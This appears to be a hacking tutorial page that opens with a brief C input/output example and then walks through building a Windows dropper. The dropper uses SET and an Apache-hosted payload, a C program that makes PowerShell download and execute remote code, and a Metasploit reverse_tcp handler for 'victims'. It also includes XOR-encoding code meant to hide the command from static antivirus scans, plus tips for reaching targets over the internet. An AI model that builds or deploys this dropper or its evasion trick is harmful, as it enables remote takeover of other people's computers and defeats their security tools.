C Programming
While Assembly gets right down to the core, sometimes higher-level languages get jobs done a lot faster. Here we will be looking at one of the most useful programming languages, and using it against our victims in an attempt at exploitation.
The C programming language was created by Dennis Ritchie at Bell Labs in the early 1970s; Brian Kernighan co-wrote the book that introduced it to most programmers. Like Assembly, C is not object-oriented, and do not expect to have it mastered quickly: being a god at C++ does not mean you can write C.
Speaking of writing the language, let's take a quick look at reading it.
Input and Output Example
Just to quickly illustrate the language's basic features, we'll start by looking at an example application. It prompts you to "Enter an integer", then prints whatever number you typed back to you.
#include <stdio.h>

// This is a single-line comment. It is ignored when the code is compiled.
int main(void)
{
    int a;
    printf("Enter an integer\n");               // Prints text to the screen
    if (scanf("%d", &a) != 1) {                  // Reads user input into the integer 'a'.
        printf("That was not an integer\n");     // scanf returns the number of items it converted,
        return 1;                                // so anything other than 1 means the input was not a number.
    }
    printf("Integer that you have entered is %d\n", a); // %d (decimal) is replaced by the value of 'a'
    return 0;
}
Output:
Enter an integer
99
Integer that you have entered is 99

Process returned 0 (0x0)   execution time : 1.949 s
Press any key to continue
Many more examples of this language can be found here.
Powershell Attack Vector FUD W/ Metasploit & SET
Now I will give a tutorial for making a PowerShell attack vector with SET on Kali Linux. You can follow this on another distribution as long as you have setoolkit, Apache, Metasploit and a C compiler that can produce Windows executables (the MinGW-w64 cross compiler, i686-w64-mingw32-gcc).
This will give you an idea of how little C is needed to wrap a payload in what was called a FUD (fully undetectable) dropper. Treat "undetectable" as a claim to verify against the target's antivirus and EDR rather than a given: a plain powershell.exe invocation containing IEX and downloadstring is one of the most heavily signatured command lines there is, and the dropper below stores it in clear text.
Creating the payload with SET
To create the payload, we first need to type the following in a root-privileged terminal:
setoolkit
After giving it time to load, it presents a numbered menu. Press '1' and enter to select "Social Engineering Attacks". In the next menu press '9' and enter to select "Powershell Attack Vectors". It then asks which type of PowerShell attack vector we want; press '1' for "Alphanumeric Shellcode Injector".
- Here it will ask for the attacker's LHOST; paste in your IP address. (Tip: ifconfig shows all your network interfaces, including their IP addresses.)
- Next, it will ask for your LPORT. You can either accept the default (shown in brackets) by hitting enter, or type one of your own, but be sure to remember it.
- Finally, it will ask whether it should start a listener for you. Skip this; we will do it ourselves later.
- It will then write its output under /root/.set/reports/powershell, including the file x86_powershell_injection.txt, which you should move to your desktop.
Deploying our payload to the Apache server
Now we upload our new payload to an Apache server, so that PowerShell on the victim can download it when our C program runs.
- First, move x86_powershell_injection.txt to /var/www/html/payload.txt so Apache can serve it.
- Next, start Apache with the following command:
service apache2 start
Great, now we're ready to make the virus.
Creating the FUD with C
First, open a file named "evil.c" on your Desktop with Vim or Nano. Fill it with the following C source code:
#include <stdio.h>
#include <stdlib.h>   // system() is declared here, not in stdio.h

int main(void)
{
    // Launches PowerShell on the victim and has it download and run the SET payload
    // in memory. The URL needs the http:// scheme or DownloadString rejects it.
    system("powershell.exe \"IEX ((new-object net.webclient).downloadstring('http://YOURLHOSTHERE/payload.txt'))\"");
    return 0;
}
Remember to change "YOURLHOSTHERE" with the LHOST you used when creating the payload in SET.
Now we compile evil.c. The target is Windows, so the ordinary gcc on Kali is the wrong tool: it produces a Linux ELF binary no matter what extension you give the output file, and that binary will not run on the victim. Use the MinGW-w64 cross compiler instead (apt install mingw-w64 if it is missing):
i686-w64-mingw32-gcc ~/Desktop/evil.c -o ~/Desktop/evil.exe
Now that we've compiled our program into a runnable file, we can start our listener.
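Before moving on to the listener, it is worth checking what "FUD" actually buys you here. The following is an added example, not code from the original page, from SET or from Metasploit: it scans a buffer for the same substrings that strings | grep or a static antivirus signature would find in the compiled dropper, then shows how storing the command line XOR-encoded (and decoding it at run time, right before the system() call) removes those substrings while still reproducing the exact command. The address 192.0.2.10 stands in for YOURLHOSTHERE and the XOR key is an arbitrary choice; both are placeholders. Note what this does not change: the dropper still spawns powershell.exe with IEX and downloadstring on its command line, so process-creation logging, PowerShell script block logging and AMSI see exactly the same thing as before. String encoding defeats only a static string scan.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* The dropper's command line as the page builds it. 192.0.2.10 is a placeholder
 * (documentation range) standing in for YOURLHOSTHERE. */
static const char PLAIN_CMD[] =
    "powershell.exe \"IEX ((new-object net.webclient)"
    ".downloadstring('http://192.0.2.10/payload.txt'))\"";

/* Substrings a trivial scanner (strings | grep, or a static AV string signature)
 * would look for in the compiled binary. */
static const char *const MARKERS[] = {
    "powershell", "IEX", "net.webclient", "downloadstring"
};

/* Arbitrary XOR key (placeholder). Two bytes have the high bit set, so in any run of
 * three consecutive encoded bytes at least one is >= 0x80 and cannot be an ASCII
 * letter; no marker of three or more characters can survive encoding by accident. */
static const unsigned char KEY[] = { 0x5a, 0x13, 0xc7, 0x2e, 0x91 };

/* Case-insensitive substring search over a raw byte buffer (not NUL-terminated). */
static int contains_nocase(const unsigned char *buf, size_t n, const char *needle)
{
    size_t m = strlen(needle);
    if (m == 0 || m > n)
        return 0;
    for (size_t i = 0; i + m <= n; i++) {
        size_t j = 0;
        while (j < m && tolower(buf[i + j]) == tolower((unsigned char)needle[j]))
            j++;
        if (j == m)
            return 1;
    }
    return 0;
}

/* Number of distinct markers present in buf; 0 means a string scan finds nothing. */
int count_markers(const unsigned char *buf, size_t n)
{
    int hits = 0;
    for (size_t k = 0; k < sizeof MARKERS / sizeof MARKERS[0]; k++)
        if (contains_nocase(buf, n, MARKERS[k]))
            hits++;
    return hits;
}

/* XOR in with a repeating key into out. XOR is its own inverse, so the same call
 * encodes at build time and decodes at run time. */
void xor_buf(const unsigned char *in, unsigned char *out, size_t n,
             const unsigned char *key, size_t klen)
{
    for (size_t i = 0; i < n; i++)
        out[i] = in[i] ^ key[i % klen];
}

/* What a scanner sees in the plain dropper: every marker is present. */
int plaintext_marker_hits(void)
{
    return count_markers((const unsigned char *)PLAIN_CMD, strlen(PLAIN_CMD));
}

/* What it sees once only the encoded bytes are stored in the binary. */
int encoded_marker_hits(void)
{
    unsigned char enc[sizeof PLAIN_CMD];
    size_t n = strlen(PLAIN_CMD);
    xor_buf((const unsigned char *)PLAIN_CMD, enc, n, KEY, sizeof KEY);
    return count_markers(enc, n);
}

/* Decoding at run time must give back the exact command line passed to system(). */
int roundtrip_ok(void)
{
    unsigned char enc[sizeof PLAIN_CMD], dec[sizeof PLAIN_CMD];
    size_t n = strlen(PLAIN_CMD);
    xor_buf((const unsigned char *)PLAIN_CMD, enc, n, KEY, sizeof KEY);
    xor_buf(enc, dec, n, KEY, sizeof KEY);
    dec[n] = '\0';
    return strcmp((const char *)dec, PLAIN_CMD) == 0;
}

int main(void)
{
    printf("markers visible in plain dropper:   %d\n", plaintext_marker_hits());
    printf("markers visible after XOR encoding: %d\n", encoded_marker_hits());
    printf("decoded command matches original:   %s\n", roundtrip_ok() ? "yes" : "no");
    return 0;
}
```

In a real build the encoded bytes would be generated by a separate step and only the encoded array and key would be compiled into evil.exe; this file keeps the plain command alongside them so that it runs stand-alone. Run strings on your own evil.exe before and after making that change and you will see exactly what a signature scanner sees.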
Starting the listener
Now we can start the Metasploit framework. Type:
msfconsole
After it loads, type:
use multi/handler
Now we can set these options, like I listed below:
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 1.1.1.1
set LPORT 443
Obviously, like before, change the LHOST and LPORT to the values you used when making the payload in SET.
Now start the listener:
exploit
(Use exploit -j to run the handler as a background job so the console stays usable; set ExitOnSession false first if you expect more than one victim to connect.)
Now, when someone runs your evil.exe file, a Meterpreter session opens in this console.
Opening sessions
If a session is not opened for you automatically, list the open sessions and their IDs with:
sessions -l
And finally, to open a session:
sessions -i 1
Final notes
Please remember that this only works if the victim can reach both the Apache server (to fetch payload.txt) and the Metasploit handler (to connect back) at the LHOST you gave. If LHOST is a private address, that means the victim has to be on your LAN. To test against victims over the internet, try one of the following:
- Hamachi (or a similar virtual LAN service)
- VPN
- Port forwarding on your router to the Apache and handler ports, with LHOST set to your public address